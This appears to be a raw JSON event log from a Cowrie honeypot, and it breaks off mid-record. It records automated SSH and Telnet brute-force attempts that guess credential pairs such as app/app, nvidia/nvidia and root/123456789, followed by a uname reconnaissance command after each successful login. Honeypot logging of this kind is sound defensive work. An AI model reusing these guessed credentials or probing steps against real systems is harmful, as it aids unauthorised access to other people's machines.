{"eventid":"cowrie.session.closed","duration":13.603761196136475,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:02.337049Z","src_ip":"212.227.125.160","session":"68697f783286"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33004,"dst_ip":"1.2.3.4","dst_port":23,"session":"42d70aedc8a7","protocol":"telnet","message":"New connection: 212.227.125.160:33004 (1.2.3.4:23) [session: 42d70aedc8a7]","sensor":"my-vps","timestamp":"2025-08-28T07:23:02.499273Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57220,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2eec3c4111d","protocol":"ssh","message":"New connection: 212.227.125.160:57220 (1.2.3.4:22) [session: e2eec3c4111d]","sensor":"my-vps","timestamp":"2025-08-28T07:23:05.720785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:05.733506Z","src_ip":"212.227.125.160","session":"e2eec3c4111d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:05.940621Z","src_ip":"212.227.125.160","session":"e2eec3c4111d"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T07:23:06.800378Z","src_ip":"212.227.125.160","session":"e2eec3c4111d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:08.020439Z","src_ip":"212.227.125.160","session":"e2eec3c4111d"}
{"eventid":"cowrie.session.closed","duration":13.668309926986694,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:11.519357Z","src_ip":"212.227.125.160","session":"4ded4a58de39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33188,"dst_ip":"1.2.3.4","dst_port":23,"session":"922f47a4c7cc","protocol":"telnet","message":"New connection: 212.227.125.160:33188 (1.2.3.4:23) [session: 922f47a4c7cc]","sensor":"my-vps","timestamp":"2025-08-28T07:23:11.717305Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45992,"dst_ip":"1.2.3.4","dst_port":22,"session":"11ee6365ff12","protocol":"ssh","message":"New connection: 212.227.235.229:45992 (1.2.3.4:22) [session: 11ee6365ff12]","sensor":"my-vps","timestamp":"2025-08-28T07:23:12.316564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:12.317432Z","src_ip":"212.227.235.229","session":"11ee6365ff12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:12.576758Z","src_ip":"212.227.235.229","session":"11ee6365ff12"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T07:23:13.660585Z","src_ip":"212.227.235.229","session":"11ee6365ff12"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:14.923022Z","src_ip":"212.227.235.229","session":"11ee6365ff12"}
{"eventid":"cowrie.session.closed","duration":13.199738264083862,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:15.698940Z","src_ip":"212.227.125.160","session":"42d70aedc8a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33260,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e0b2c79f296","protocol":"telnet","message":"New connection: 212.227.125.160:33260 (1.2.3.4:23) [session: 7e0b2c79f296]","sensor":"my-vps","timestamp":"2025-08-28T07:23:15.884161Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43852,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac94437a50d5","protocol":"ssh","message":"New connection: 212.227.125.160:43852 (1.2.3.4:22) [session: ac94437a50d5]","sensor":"my-vps","timestamp":"2025-08-28T07:23:22.182414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:22.183351Z","src_ip":"212.227.125.160","session":"ac94437a50d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:22.401769Z","src_ip":"212.227.125.160","session":"ac94437a50d5"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-28T07:23:23.060391Z","src_ip":"212.227.125.160","session":"ac94437a50d5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:24.280699Z","src_ip":"212.227.125.160","session":"ac94437a50d5"}
{"eventid":"cowrie.session.closed","duration":13.547935247421265,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:25.265161Z","src_ip":"212.227.125.160","session":"922f47a4c7cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41292,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7deb29e9a8a","protocol":"ssh","message":"New connection: 212.227.235.229:41292 (1.2.3.4:22) [session: d7deb29e9a8a]","sensor":"my-vps","timestamp":"2025-08-28T07:23:28.588023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:28.589037Z","src_ip":"212.227.235.229","session":"d7deb29e9a8a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:28.836112Z","src_ip":"212.227.235.229","session":"d7deb29e9a8a"}
{"eventid":"cowrie.session.closed","duration":13.36677098274231,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.250862Z","src_ip":"212.227.125.160","session":"7e0b2c79f296"}
{"eventid":"cowrie.session.closed","duration":46.32043647766113,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.354803Z","src_ip":"212.227.125.160","session":"01551966aada"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33521,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc6d21393039","protocol":"telnet","message":"New connection: 212.227.125.160:33521 (1.2.3.4:23) [session: dc6d21393039]","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.444109Z"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.578066Z","src_ip":"212.227.235.229","session":"d7deb29e9a8a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":52821,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3767e9d12db","protocol":"ssh","message":"New connection: 80.94.95.15:52821 (1.2.3.4:22) [session: a3767e9d12db]","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.685785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.687058Z","src_ip":"80.94.95.15","session":"a3767e9d12db"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:23:29.753140Z","src_ip":"80.94.95.15","session":"a3767e9d12db"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T07:23:30.040289Z","src_ip":"80.94.95.15","session":"a3767e9d12db"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:30.828089Z","src_ip":"212.227.235.229","session":"d7deb29e9a8a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:31.116960Z","src_ip":"80.94.95.15","session":"a3767e9d12db"}
{"eventid":"cowrie.session.closed","duration":46.28487253189087,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:32.425238Z","src_ip":"212.227.235.229","session":"5e445e48fa34"}
{"eventid":"cowrie.session.closed","duration":46.266223430633545,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:33.442816Z","src_ip":"212.227.235.229","session":"baca2329d7e3"}
{"eventid":"cowrie.session.closed","duration":46.3080689907074,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:34.432584Z","src_ip":"212.227.125.160","session":"24fc2932d66a"}
{"eventid":"cowrie.session.closed","duration":46.262357234954834,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:37.501416Z","src_ip":"212.227.235.229","session":"df0a5c9bddf8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39358,"dst_ip":"1.2.3.4","dst_port":22,"session":"caec1ab8fb16","protocol":"ssh","message":"New connection: 212.227.125.160:39358 (1.2.3.4:22) [session: caec1ab8fb16]","sensor":"my-vps","timestamp":"2025-08-28T07:23:38.330559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:38.346359Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.session.closed","duration":46.34165096282959,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:38.474158Z","src_ip":"123.31.39.100","session":"f77faf09e1d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:38.544957Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:23:39.388046Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.session.closed","duration":47.32856464385986,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:39.508245Z","src_ip":"212.227.125.160","session":"b36a6044b6a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:23:39.830281Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:23:39.830969Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:40.127049Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:40.128112Z","src_ip":"212.227.125.160","session":"caec1ab8fb16"}
{"eventid":"cowrie.session.closed","duration":12.78393030166626,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:42.227967Z","src_ip":"212.227.125.160","session":"dc6d21393039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33749,"dst_ip":"1.2.3.4","dst_port":23,"session":"25cbaf530752","protocol":"telnet","message":"New connection: 212.227.125.160:33749 (1.2.3.4:23) [session: 25cbaf530752]","sensor":"my-vps","timestamp":"2025-08-28T07:23:42.416779Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44542,"dst_ip":"1.2.3.4","dst_port":22,"session":"159bcc116bce","protocol":"ssh","message":"New connection: 212.227.235.229:44542 (1.2.3.4:22) [session: 159bcc116bce]","sensor":"my-vps","timestamp":"2025-08-28T07:23:44.884675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:44.885569Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:45.140064Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:23:46.158977Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:23:46.753097Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:23:46.753776Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:47.010323Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:47.011427Z","src_ip":"212.227.235.229","session":"159bcc116bce"}
{"eventid":"cowrie.session.closed","duration":47.355478048324585,"message":"Connection lost after 47 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:47.619390Z","src_ip":"123.31.39.100","session":"c857e8a5110b"}
{"eventid":"cowrie.session.closed","duration":46.30072855949402,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:47.623696Z","src_ip":"123.31.39.100","session":"cf3bdc6623ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52170,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf6a2f59d537","protocol":"ssh","message":"New connection: 212.227.125.160:52170 (1.2.3.4:22) [session: cf6a2f59d537]","sensor":"my-vps","timestamp":"2025-08-28T07:23:54.534601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:23:54.535576Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],